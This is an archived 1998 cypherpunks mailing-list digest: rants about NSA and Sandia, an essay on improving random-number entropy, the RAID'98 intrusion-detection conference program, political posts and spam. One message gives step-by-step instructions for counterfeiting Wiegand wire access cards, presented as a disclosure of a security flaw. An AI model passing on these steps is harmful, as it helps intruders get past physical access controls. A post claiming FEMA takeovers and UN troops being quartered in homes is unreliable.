From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Fri, 31 Jul 1998 11:13:25 -0700 (PDT)
To: tcmay@got.net
Subject: From: dac@zurich.ibm.com (Marc Dacier)
Message-ID: <35C20839.43A1@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Friday 7/31/98 11:40 AM

John Young

I am looking at http://www.jya.com/raid98.htm

Dacier asked me why NSA/Sandia was concerned about what
each bit in an executable image did when I was in his office in
Zurich in April 1997.

Spiking, of course.  A SECRET OTHER FUNCTION to a device.

http://caq.com/cryptogate  http://www.aci.net/kalliste/speccoll.htm

NSA/Sandia doesn't trust its own employees!  

On the other hand, NSA/Sandia employees don't trust NSA/Sandia either.

The REAL WORLD again.

IBM Zurich was BIG into Java.

Network World, July 20, 1998 page 6

  The incredible shrinking Java alliance

  By Chris Nerney and Andy Eddy

    A year ago there were four of them, members of a new alliance
  touting a potent new weapon designed to end Microsoft Corp.'s
  growing dominance in the computing industry.
    Now the Java Gang of Four is the Gang of Two and a Half.
    Java creator Sun Microsystems, Inc., of course, is still fully
  committed to the programming language, as is IBM. ...

Not looking good for Java future.

Java is similar to FORTH.  FORTH executes super-slow on high-level
in most machines.  About 10% of the speed of a compiled-language
program - such as Visual Basic.

Specialized Forth and Java machine can be made to run fast.
http://groucho.gsfc.nasa.gov/forth/ and http://www.ptsc.com/ 

But I am not confident Java or Forth machines are going anywhere.
May be hard to get parts in the future.  

But I'm confident about the 80C32 supply!
http://www.apcatalog.com/cgi-bin/AP?ISBN=0125475705&LOCATION=US&FORM=FORM2

Let's hope this UNFORTUNATE matter http://jya.com/whpfiles.htm gets
settled soon so that we can move on to constructive projects.

Later
bill


/\/\/\

Marc

Since I was working the OTHER SIDE of

  Recent Advances in Intrusion Detection 

for the FBI, I might be able to give a nice talk about what the US
government is REALLY UP TO on defeating intrusion detection!

I am not reading e-mail.

best
bill

Hi Matthias!


Counterfeiting Wiegand Wire Access Credentials
     
                                   Bill Payne
     
                                 October 16,1996
     
                                    Abstract
     
                  Wiegand wire access credentials are easy and
                  inexpensive to counterfeit.
     
        Access Control & Security Systems Integration magazine, October
        1996 [http://www/securitysolutions.com] published the article,
     
             Wiegand technology stands the test of time
     
             by PAUL J. BODELL, page 12
     
             Many card and reader manufacturers offer Wiegand (pronounced
             wee-gand) output.  However, only three companies in the
             world make Wiegand readers.  Sensor Engineering of Hamden
             Conn., holds the patent for Wiegand, and Sensor has licensed
             Cardkey of Simi Valley, Calif., and Doduco of Pforzheim,
             Germany, to manufacture Wiegand cards and readers. ...  A
             Wiegand output reader is not the same thing as a Wiegand
             reader,  and it is important to understand the differences.
     
                In brief, Wiegand reader use the Wiegand effect to
             translate card information around the patented Wiegand
             effect in which a segment of a specially treated wire
             generates an electronic pulse when subjected to a specific
             magnetic field.  If the pulse is generated when the wire is
             near a pick-up coil, the pulse can be detected by a circuit.
             Lining up several rows of wires and passing them by a cold
             would generate a series of pulses.  Lining up two rows of
             wires - calling on row "zero bits" and the other "one bits"
             - and passing them by two different coils would generate two
             series of pulses, or data bits.  These data bits can then be
             interpreted as binary data and used to control other
             devices.  If you seal the coils in a rugged housing with
             properly placed magnets, and LED and some simple circuitry,
             you have a Wiegand reader.  Carefully laminate the special
             wires in vinyl, and artwork, and hot-stamp a number on the
             vinyl, and you have a Wiegand card.
     
             IN THE BEGINNING
     
               Wiegand was first to introduce to the access control
             market in the late 1970s.  It was immediately successful
             because it filled the need for durable, secure card and
             reader technology.
               Embedded in the cards, Wiegand wires cannot be altered or
             duplicated. ...
     
        Bodell's Last statement is incorrect.
     
        Tasks for EASILY counterfeiting Wiegand wire cards are
     
        1    Locate the wires inside the card to read the 0s and 1s.
     
        2    Build an ACCEPTABLE copy of the card.
     
        Bodell's clear explanation of the working of a Wiegand card can
        be visualized
     
             zero row    |     |   |
     
             one row        |          |
     
             binary      0  1  0   0   1
             representation
     
        Solutions to Task 1
     
             A    X-ray the card
     
             B    MAGNI VIEW FILM,  Mylar film reads magnetic fields ...
                  Edmunds Scientific Company, catalog 16N1, page
                  205, C33,447  $11.75
     
        is placed over the top of the Wiegand card.
     
        COW MAGNET,  Cow magnetics allow farmers to trap metal in the
        stomachs of their cows.  Edmunds, page 204, C31,101 $10.75
        is placed under the card.
     
        Location of the wires is easily seen on the green film.
     
        Mark the position of the wires with a pen.
     
        Next chop the card vertically using a shear into about 80/1000s
        paper-match-sized strips.
     
        Don't worry about cutting a wire or two.
     
        Note that a 0 has the pen mark to the top.  A 1 has the pen mark
        at the bottom.
     
        Take a business card and layout the "paper match"-like strips to
        counterfeit the card number desired.
     
        Don't worry about spacing.  Wiegand output is self-clocking!
     
        Tape the "paper-match - like" strips to the business card.
     
        Only the FUNCTION of the card needs to be reproduced!
     
                                     History
     
        Breaking electronic locks was done as "work for others" at Sandia
     
        National Laboratories beginning in 1992 funded by the Federal
        Bureau of Investigation/Engineering Research Facility, Quantico,
        VA.
     
        The FBI opined that this work was SECRET/NATIONAL SECURITY
        INFORMATION.
     
        Details of the consequences of this work are covered in
     
             Fired Worker File Lawsuit Against Sandia
             Specialist Says He Balked When Lab Sought Electronic
             Picklock Software, Albuquer Journal, Sunday April 25, 1993
     
             State-sanctioned paranoia,  EE Times, January 22, 1996
     
             One man's battle,  EE Times, March 22, 1994
     
             Damn the torpedoes,  EE Times, June 6, 1994
     
             Protecting properly classified info,  EE Times, April 11,
             1994
     
             DOE to scrutinize fairness in old whistle-blower cases,
             Albuquerque Tribune, Nov 7 1995
     
             DOE boss accelerates whistle-blower protection,  Albuquerque
             Tribune, March 27, 1996
     
             DOE doesn't plan to compensate 'old' whistle-blowers with
             money, Albuquerque Tribune September 27, 199




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 31 Jul 1998 10:48:06 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 31, 1998
Message-ID: <199807311730.MAA25935@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@m7.sprynet.com>
Date: Fri, 31 Jul 1998 13:54:05 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Refining entropy
In-Reply-To: <199807302045.WAA19934@replay.com>
Message-ID: <3.0.5.32.19980731134616.007c42d0@m7.sprynet.com>
MIME-Version: 1.0
Content-Type: text/plain




This essay addresses the question, How can we improve the output of a bad
true RNG?  By "true RNG" I mean a source of unpredictability, which
necessarily derives from an analog measurement.  By "bad" RNG
I mean that its output does not carry one bit of information per binary
symbol.  This means that not all output symbols are equiprobable.  Methods
to improve various properties of RNGs are called conditioning algorithms.

I had begun by thinking that, since the output of a block cipher in
feedback mode (ie, a stream cipher) is uniformly distributed ("white") that
it would be sufficient conditioning to feed a bad RNG into a block cipher
with feedback.  Here, the bad RNG would kick the cipher out of the fixed,
but key-dependant, sequence it would otherwise generate.

But it bothered me that I was producing more apparently-random bits than I
actually had negentropy.

On cypherpunks, Bill Stewart mentioned using hashes instead of ciphers.  A
hash is like a cipher in that
changing any input or key bit changes the  output unpredictably, but a hash
is irreversible because there are fewer output bits than input bits.    The
simplest hash is a one-bit parity; MD5
is a more expensive keyed hashing function used for message authentication.

Thinking about a hash instead of a cipher was interesting because now we
reduce the number of output bits, which if done right, could improve the
information carried by each binary digit.  We take the MAC of an imperfect
random number and toss the original random, retaining the MAC as our better
random value.

Can we get an analytic handle on this?

Let's take Mr. Shannon's measure of information over a discrete alphabet.
The average amount of information per symbol is the (negation of the) sum
of the probabilities of each symbol times the log base 2 of that probability.

If we have two symbols, A and B, and each occurs half the time, we have 
	1/2 * log (1/2) + 1/2 * log(1/2) = -1 = 1 bit, which is what we expect.

If symbol A occurs, say, 3 times more often than B, we get:
	3/4* log(3/4) + 1/4*log(1/4) = 3/4(log 3 - 2) + -2/4 = 3/4 log 3 - 6/4 -
2/4 = 3/4 log 3 - 2 = 
	2- 3/4*log 3 bits/symbol after handling the minus sign.  This is less than
the optimum 1 bit/symbol, achieved when the symbols are equiprobable as above.

So now we have demonstrated how to use Shannon to measure the actual
entropy carried by each imperfectly random symbol. We now use this to
measure the result of XORing two such imperfect values.

We continue to use the imperfect RNG source where A occurs 3/4 time, B
occurs 1/4 time.  We take 
two of these badbits and XOR them: 
A.A=A, 
A.B=B, 
B.A=B, 
B.B=A.

We now compute the liklihood of each output symbol: 

A.A	3/4 * 3/4 = 9/16	(A)
A.B	3/4 * 1/4 = 3/16	(B)
B.A	1/4 * 3/4 = 3/16	(B)
B.B	1/4 * 1/4 =1/16	(A)

So the output has symbol A 10/16 of the time, and B 6/16 of the time.  The
difference in frequency has decreased; the distribution becomes more
uniform, which means that the information content of the output has
increased.  The information content of the whole system can only decrease;
but if you destroy the inputs
the output carries their entropy.
	
The exact amount of information per symbol in the 10:6 distribution is 
	10/16 * log(10/16) + 6/16 * log(6/16) = 10/16 * (log10 - 4) + 6/16*(log6
-4) = 
	10/16 log 10 - 40/16 + 6/16 log 6 - 24/16 = 
	10/16 log 10 + 6/16 log 6 - 4 the negative of which is
	4 - (10log 10 + 6 log 6) / 16
	Which is less than 1 but more than the content of each of the 2 bits we
started with.

Intuitively, we have gone from this distribution:
 
----
------------

crossed with itself, yields this distribution of states: 

-
---
---
---------

which when collapsed yields this: 

------
----------


So: we can use Shannon's analytic measure to look at entropy collection
through
a combination of imperfect input bits.  It shows us that we'll never get
perfectly uniformly 
distributed symbols by combining arbitrary quantities of nonuniformly
distributed symbols, but we can get arbitrarily close.  All we need is more
input.
Quantity vs. quality.

A video ADC acquires say 8 bits resolution at 4 msamples/sec.  This might
condense down to 
4 Mbits/sec true negentropy, which is about half the rate of regular Ethernet.



honig@alum.mit.edu

   "Speech is not protected simply because it is written in a language"	
	Federal Misjudge Gwin on the Bernstein Case









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@hun.org>
Date: Fri, 31 Jul 1998 07:52:26 -0700 (PDT)
To: Declan McCullagh <cypherpunks@toad.com>
Subject: Re: FC: Libertarian Party asks for Clinton impeachment
In-Reply-To: <Pine.GSO.3.95.980731070307.11804A-100000@well.com>
Message-ID: <Pine.BSF.3.96.980731144730.1329B-100000@hun.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 31 Jul 1998, Declan McCullagh wrote:

>
>   Libertarians to Congress: Impeach Clinton for Bad Net Policy
>   By Declan McCullagh
>
>   [snip]
>

	and then they wonder why they received less than 1% of the
	vote in '96.

	good enough reasons if they do the trick, but I would rather
	they not impeach him; an impeachment hearing will put the
	ice pack on the market... and by the time the Senate can
	get around to finishing the deed, Clinton will have turned
	the government over to FEMA for some flim-flam excuse. better
	start getting ready to quarter the UN barbarian troops in
	your house.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 31 Jul 1998 12:09:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cracking DES 9-12
Message-ID: <199807311909.PAA21158@camel7.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


We've added Chapters 9-12, same URL:

    http://jya.com/cracking-des.htm  (146K + 9 images)

No prohibited code, yet.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sat, 1 Aug 1998 01:32:15 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Better living through masterbation/Digestible Dildos
Message-ID: <19980731151300.12433.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/31/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Fri, 31 Jul 1998 12:27:43 -0700 (PDT)
To: Tim May <tcmay@got.net>
Subject: Re: Comments on this Pentagon opinion...not a new debate
In-Reply-To: <v0313030ab1e7af92cef4@[209.66.100.109]>
Message-ID: <35C21B6F.449E12C1@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> 
> At 10:01 AM -0700 7/31/98, Harvey Rook (Exchange) wrote:

[...body of text snipped...]
> 
> The latest crypto proposals have brought nothing new to the debate.

Indeed.

It strikes me as alarming at times, when considering the condition of
civil liberties in this country and just how close government tries to
shave off freedoms that are not *explicit* in the bill of rights, how
poorer our liberties would be defended without those ten, basic
amendments; and further, that they were added as an after thought,
ridiculed by many, demanded by some, but they have proven to be one of
the last lines of defence between our liberties and this centralised,
law making den in Washington.  These ten are not nearly enough.

Richard Storey




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dac@zurich.ibm.com (Marc Dacier)
Date: Fri, 31 Jul 1998 07:02:07 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RAID98: Call For Registration
Message-ID: <9807311401.AA36670@selun.zurich.ibm.com>
MIME-Version: 1.0
Content-Type: text/plain



		   Call For Registration - RAID'98

		 First International Workshop on the
		Recent Advances in Intrusion Detection

			     Sponsored by

		  the IBM Emergency Response Service
		       (http://www.ers.ibm.com)
				 and
		 the Joint Research Centre of the EC
	   (Institute for Systems, Informatics and Safety)
			(http://ntsta.jrc.it)

			September 14-16, 1998
		      Louvain-la-Neuve, Belgium


***********************************************************************

			  Visit our web site

		http://www.zurich.ibm.com/~dac/RAID98

    for on-line information regarding the preliminary program, the
	    registration forms, accommodations, maps, etc..

***********************************************************************


RAID'98 is the first in an anticipated annual series of international
workshops that will bring together leading figures from academia,
government, and industry to ponder the current state of intrusion
detection1 technologies and paradigms from the research and commercial
perspectives.  Its aim is to further progress in intrusion detection
by promoting the exchange of ideas among researchers, system
developers, and users and by encouraging links between these groups.

RAID'98 will be held in Louvain-la-Neuve, Belgium, on 14-16 September
1998. RAID'98 will be held in the same location as CARDIS'98
(http://www.dice.ucl.ac.be/cardis98) and ESORICS'98
(http://www.dice.ucl.ac.be/esorics98), at the same time as the former
and just prior to the latter. A registration discount is available to
those attending both the ESORICS conference and the RAID workshop.

Registration is now open, and will continue until 21 August 1998. Late
registration will continue until 4 September 1998, but only on a
space-available basis, and will include a penalty of 2000 BEF. If you
need more information regarding registration or accommodations, please
take contact with Catherine Rouyer

E-mail: Rouyer@tele.ucl.ac.be

RAID Secretariat
UCL/TELE (Mrs. Catherine Rouyer)
Place du Levant, 2
B-1348 Louvain-la-Neuve
Belgium

************************** PRELIMINARY PROGRAM *************************
**** html version available:  http://www.zurich.ibm.com/~dac/RAID98 ****


MONDAY SEPTEMBER 14,1998
========================

8:00  9:00
Transfers from hotels, coffee service and participant check-in

Session 1 (Session Chair: Kathleen Jackson)
-------------------------------------------

9:00 - 9:20
  Welcome and Introduction
      Marc Dacier (IBM ZRL, Switzerland), Jean-Jacques
      Quisquater (UCL, Belgium).
9:20 - 9:40
  The Rome Labs Experience
      Kevin Ziese (Cisco Systems, Inc., USA)
9:40 - 10:00
  Intrusion Detection and Legal Proceedings
      Peter Sommer (London School of Economics and Political Science, UK)
10:00 - 10:20
  Lessons Learned in the Implementation of a
  Multi-Location Network Based Real Time Intrusion Detection System
      Michael Puldy (IBM Emergency Response Service, USA)


10:20 - 10:40
  Break - Coffee service


Session 2 (Session Chair:  Baudouin Le Charlier)
------------------------------------------------  

10:40 - 11:00
  GASSATA, A Genetic Algorithm as an Alternative Tool for
  Security Audit Trails Analysis
      Ludovic Me (SUPELEC, France)
11:00 - 11:20
  Using Bottleneck Verification to Find Novel New Attacks
  with a Low False Alarm Rate
      Richard Lippmann (MIT Lincoln Laboratory, USA)
11:20 - 11:40
  The Use of Information Retrieval Techniques for Intrusion Detection
      Ross Anderson (University of Cambridge, UK)
11:40 - 12:00
  Tools for Intrusion detection: Results and Lessons
  Learned from the ASAX Project
      Abdelaziz. Mounji (Computer Science Institute, Belgium)


12:00 - 13:30
Lunch


Session 3   (Session Chair:  Yves Deswarte)
-------------------------------------------  

13:30 - 13:50
  Dependability of Large-scale Infrastructures and
  Challenges for Intrusion Detection 
      Marc Wilikens (Institute for Systems, Informatics and Safety, Italy)
13:50 - 14:10
  How Re(Pro)active Should An IDS Be?
      Richard Overill (King's College London, UK)
14:10 - 14:30
  Contribution of Quantitative Security Evaluation to Intrusion Detection
      Yves Deswarte (LAAS-CNRS &amp; INRIA, France)
14:30 - 14:50
  Intrusion Detection in Telecommunication
      Hai-Ping Ko (GTE Laboratories Incorporated, USA)


14:50 - 15:10
Break - Beverages


Session 4   (Session Chair:  TBD)
---------------------------------  

15:10 - 15:30
  Problems with Networkbased Intrusion Detection for Enterprise Computing
      Thomas Daniels (Purdue University, USA)
15:30 - 15:50
  Transitioning IDS Research Into a Viable Product
     Mark Crosbie (Hewlett-Packard Corporation, USA)
15:50 - 16:10
  Enhanced Network Intrusion Detection in a Smart Enterprise Environment
      Ricci Ieong (Hong Kong University of Science and Technology, Hong Kong)
16:10 - 16:30
  Integrating Intrusion Detection into the Network/Security Infrastructure
      Mark Wood (Internet Security Systems, Inc, USA)


16:30 - 16:50
Break - Refreshments

  
Session 5 (Panel Chair: Rowena Chester)
---------------------------------------

16:50 - 18:00 
  The Nature and Utility of Standards Organizations
  for the Intrusion Detection Developers Community

      Participants
        Dick Brackney (NSA)
        Rowena Chester (Chair NCITS (ANSI) T4 Committee)
        Roger French (Compaq)
        Walter Fumy (Chair ISO SC27)
        Larry Nelson (AT&amp;T)
        Vern Paxson (LBNL)
        Gene Spafford (Purdue University)
        Mark Zalewski (Chair TC68)

18:00 - 19:30
Transfers to and from hotels

19:30 - 22:00
Banquet

22:00
Transfers to hotels  
  

TUESDAY SEPTEMBER 15,1998
=========================

8:00  9:00
Transfers from hotels and coffee service


Session 6   (Session Chair:  Timothy Grance)
--------------------------------------------  

9:00 - 9:20
  Measuring Intrusion Detection Systems
      Roy Maxion (Carnegie Mellon University, USA)
9:20 - 9:40
  The 1998 DARPA/AFRL Off-line Intrusion Detection Evaluation
      Richard Lippmann (MIT Lincoln Laboratory, USA)
9:40 - 10:00
  Securing Network Audit Logs on Untrusted Machines
      Bruce Schneier (Counterpane Systems, USA)
10:00 - 10:20
  Intrusion Detection and User Privacy - A Natural Contradiction?
      Roland Bueschkes (Aachen University of Technology, Germany)


10:20 - 10:40
Break - Coffee Service


Session 7  (Session Chair:  Marc Dacier)
----------------------------------------  

10:40 - 11:00
  Design and Implementation of an Intrusion Detection System
  for OSPF Routing Networks
      Y. Frank Jou (MCNC, USA)
11:00 - 11:20
  Designing IDLE: The Intrusion Data Library Enterprise
      Ulf Lindqvist (Chalmers University of Technology, Sweden)
11:20 - 11:40
  Design and Implementation of a Sniffer Detector
      Stephane Grundschober (IBM Zurich Research Laboratory, Switzerland)
11:40 - 12:00
  The Application of Artificial Neural Networks to Misuse Detection:
  Initial Results
      James Cannady (Georgia Tech Research Institute, USA)


12:00 - 13:30
Lunch


Session 8   (Session Chair:  Deborah Frincke)
---------------------------------------------  

13:30 - 13:50
  AAFID: Autonomous Agents for Intrusion Detection
      Diego Zamboni (Purdue University, USA)
13:50 - 14:10
  Research Issues in Cooperative Intrusion Detection Between Multiple Domains
      Deborah Frincke (University of Idaho, USA)
14:10 - 14:30
  A Large-scale Distributed Intrusion Detection Framework
  Based on Attack Strategy Analysis
      Ming-Yuh Huang (The Boeing Company, USA)
14:30 - 14:50
  NIDAR: The Design and Implementation of an Intrusion Detection System 
      Ong Tiang Hwee (DSO National Laboratories, Singapore)


14:50 - 15:10
Break - Beverages

Session 9   (Session Chair:  Peter Sommer)
------------------------------------------  

15:10 - 15:30
  A UNIX Anomaly Detection System using Self-Organising Maps
      Albert Hoeglund (Nokia Research Center, Finland)
15:30 - 15:50
  Evaluating a Real-time Anomaly-based Intrusion Detection System
      Tobias Ruighaver (University of Melbourne, Australia)
15:50 - 16:10
  Audit Trail Pattern Analysis for Detecting Suspicious Process Behavior
      Andreas Wespi (IBM Zurich Research Laboratory, Switzerland)
16:10 - 16:30
  An Immunological Approach to Distributed Network Intrusion Detection
      Steven A. Hofmeyr (University of New Mexico, USA)


16:30 - 16:50
Break - Refreshments


Session 10 (Session Chair:  Kevin Ziese)
----------------------------------------

16:50 - 17:10
  The Limitations of Intrusion Detection Systems on High Speed Networks
      Joe Kleinwaechter (Internet Security Systems, Inc, USA)
17:10 - 17:30
  CERN Network Security Monitor
      Paolo Moroni (CERN, Switzerland)
17:30 - 17:50
  HAXOR - A Passive Network Monitor/Intrusion Detection Sensor
      Alan Boulanger (IBM Watson Research Center, USA)
17:50 - 18:10
  Using Bro to detect network intruders: experiences and status
      Vern Paxson (Lawrence Berkeley National Laboratory, USA)

18:10 - 19:30
Reception

19:30
Transfers to hotels  

WEDNESDAY SEPTEMBER 16,1998
===========================
  
8:00 - 8:40
Transfers from hotels and  coffee service

Session 11 (Panel Chair:  Gene Spafford)
----------------------------------------

8:40 - 10:00
  Intrusion Detection in the Large
    Participants
      Dick Brackney (NSA)
      Deborah Frincke (University of Idaho)
      Michel Miqueu (CNES)
      Jean-Jacques Quisquater (UCL, Belgium)
      Gene Spafford (Purdue University)
      Marc Wilikens (Institute for Systems, Informatics and Safety)
      Kevin Ziese (Cisco/Wheelgroup)

10:00
  Adjourn




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbrown@freestamp.com
Date: Mon, 10 Aug 1998 23:55:35 -0700 (PDT)
Subject: RE: Requested info
Message-ID: <36321023@mailserv23de.larenim.com>
MIME-Version: 1.0
Content-Type: text/plain


This message complies with the proposed United States Federal
requirements for commercial email as well as the Washington State Commercial Email
Bill. For additional information see:
http://www.senate.gov/~murkowski/commercialemail/EMailAmendText.html
Washington State Commercial Email Bill: www.wa.gov/wwweb/AGO/junkemail/
Required sender information: American Capital, Ft. Thomas, KY 41075
debtfree2000@hotmail.com 212-796-6549 Further mailings to you may
be stopped at no cost to you by sending a reply to: www.remove-list.com. This
REMOVE list is honored by all responsable emailers.





Hello:

Let me ask you a question. ARE YOU IN DEBT?
IF YOU ARE THEN WE CAN HELP.
Think about that for a moment while I introduce our company.

We are American Capital Mortgage Services.
We specialize in helping homeowners establish ONE easy LOW monthly
payment with the added benefit of not needing any equity in your
home. American Capital is constantly working with other lenders
throughout the U.S. to provide you with the best interest rate
possible. We have a number of different companies that we work
with and this is at NO cost to you EVER.
We are simply a referral agency.

If you answered yes to the above question, please
read on as I am sure American Capital can save you a huge amount
of money on monthly payments as well as in taxes..

Consider This.....Did you know that:

~78% of Americans are in debt...
~$5,000.00 is the average Credit Card balance...
~8 Million plus people will file Bankruptcy in
1998 alone...

Are you aware that banks throughout the United States are
pressuring Congress that people in a high tax bracket can only
file Chapter 13 so that the banks have some kind of recourse.

Let me assure you these statistics are not to scare you
but rather to inform you that you may or may not be alone.

The goal of American Capital is to provide homeowners
with lenders that fit your needs. We can provide you with
lenders that will loan you up to 125% of the value of your
home and there is NO equity needed. In any case there
are NO upfront fees or advances of ANY KIND on your part.
You have nothing to lose, why not give it a shot and see if you
can better your situation.

Utilize the loan for whatever purpose you may need:

~ A new car
~ College tuition
~ Taxes
~ Credit Cards
~ Vacation
~ Home improvements
and the list goes on.......

You can have the cash in your pocket usually within 7-14
days. Did you also know that your loan is tax deductible?

HERE'S YOUR CHANCE TO FINALLY GET THIS INFORMATION AND SEE
IF DEBT CONSOLIDATION REALLY CAN BETTER YOUR SITUATION!

All we simply ask for is
your name, address, phone number
and e-mail address. The rest is optional. This way a
representative can personally call you so he or she can answer
all your detailed questions.

For a FREE loan evaluation please,
visit our website by CLICKING HERE:
http://www.frvnet.net/amcap/136.html
or type: www.frvnet.net/amcap/136.html. in your browser

Thank you for your time and I know that we can help you
in getting the money you deserve and in some cases need.

TO BE REMOVED FROM OUR MAIL LIST
CLICK HERE:
http://www.remove-list.com


****************************************************
The mailing list for this message has been
preprocessed by an independent service to remove
the addresses of those who are not interested in
unsolicited email. Free registration for this
mailer-independent removal service is at:
http://www.remove-list.com
****************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard Storey <cognitus@earthlink.net>
Date: Fri, 31 Jul 1998 14:41:01 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Comments on this Pentagon opinion...not a new debate
In-Reply-To: <Pine.LNX.3.96.980731142322.532B-100000@mothra.fastrans.com>
Message-ID: <35C23AA4.4E9C460B@earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


Jim Burnes wrote:
> 

> Just remember that, in any conceivable interpretation of the
> constitution, the federal government has *already* vastly overstepped
> their allocated powers.  Why are you so suprised that they would try
> to eliminate the few remaining liberties the sheeple have?

Irony.

> These ten are more than enough.  Jeffeson himself said, paraphrased,
> that when the state starts violating these basic liberties, then
> its time to call out the militia, start putting up tents and making
> war plans.
>

I take a view of liberty as I believe it exists under natural law.  Some
people view the constitution and bill of rights as the alpha and omega
of liberty on earth.  I am not one of them.

 
> If Jefferson were alive today he would be arrested for conspiracy
> if he simply thought out loud.

Most likey you're right.  In fact, most of the "founders" would be as
well, especially Patrick Henry! ;-)

Richard Storey




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Fri, 31 Jul 1998 17:17:30 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: From: dac@zurich.ibm.com (Marc Dacier)
In-Reply-To: <35C20839.43A1@nmol.com>
Message-ID: <199808010015.UAA11260@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <35C20839.43A1@nmol.com>, on 07/31/98 
   at 12:08 PM, bill payne <billp@nmol.com> said:

>Java is similar to FORTH.  FORTH executes super-slow on high-level in
>most machines.  About 10% of the speed of a compiled-language program -
>such as Visual Basic.

FORTH 10% of VB!! ROTHLMAO!!!! Obviously whoever wrote that doesn't have a
clue when it comes to FORTH. I have old FORTH code I wrote years ago and
even running interpreted (and yes FORTH can be compiled) it is faster than
anything the brain-dead Micky$loth crowd could ever dream of writting in
VB. Add to the fact that your average FORTH programmer has a much higher
skill set than your typical VB programmer and is capable of writting fast,
tight code (when have you ever heard fast, tight code used to describe a
VB program?)

<sigh> why am I not surprised to see yet another "journalist"
clue-impaired.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Windows?  Homey don't play that!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNcJf049Co1n+aLhhAQGzCwP/eBpCcTNbaqWTdl7lUVTz7UuV53J3r0FZ
+VZLGBmpJYCo/wZZVMahM4LZ4KFgOGFBBiydapLeaoztT21vRtNwraWe8JQFjmUA
oa6EtM5bdKYBgaaO0kzplCf4e7qLQ8whiVc0PekscZqM6tSV43jJs3wO6LbL54T6
5FpeP2ir+iE=
=hQxK
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Fri, 31 Jul 1998 18:49:38 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: From: dac@zurich.ibm.com (Marc Dacier)
In-Reply-To: <199808010015.UAA11260@domains.invweb.net>
Message-ID: <Pine.SUN.3.91.980731202519.29206A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain



> >Java is similar to FORTH.  FORTH executes super-slow on high-level in
> >most machines.  About 10% of the speed of a compiled-language program -
> >such as Visual Basic.

> FORTH 10% of VB!! ROTHLMAO!!!! 

	Rolling on the hearth?  Rolling off the house?  Ripping 
	out tiny hairs?

	Running over the hamster?

	You sadistic F@#%.

> Obviously whoever wrote that doesn't have a clue when it comes to FORTH.

	It reads especially weirdly to anyone who remembers that BASIC
	was traditionally interpreted, too.  What crazy times we live in.  

	And anyone who wants to claim VB superior to FORTH has to
	earn the right by transferring first a FORTH-made binary, then
	a VB-made binary, from one computer to another via floppy
	disks.

> VB. Add to the fact that your average FORTH programmer has a much higher
> skill set than your typical VB programmer and is capable of writting fast,
> tight code

	That's because writing in FORTH is like spending the day
	solving brain-teasers.  

	Not that that's a bad thing; I figure programmers would get
	paid a lot more for much higher quality work if they were required
	to be in extreme brain-on mode 24/7.  But at least we have C++,
	huh?  

							-Caj






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 31 Jul 1998 12:52:54 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Secret Service With A Smile - SAHMD!!! / Pwd: lco
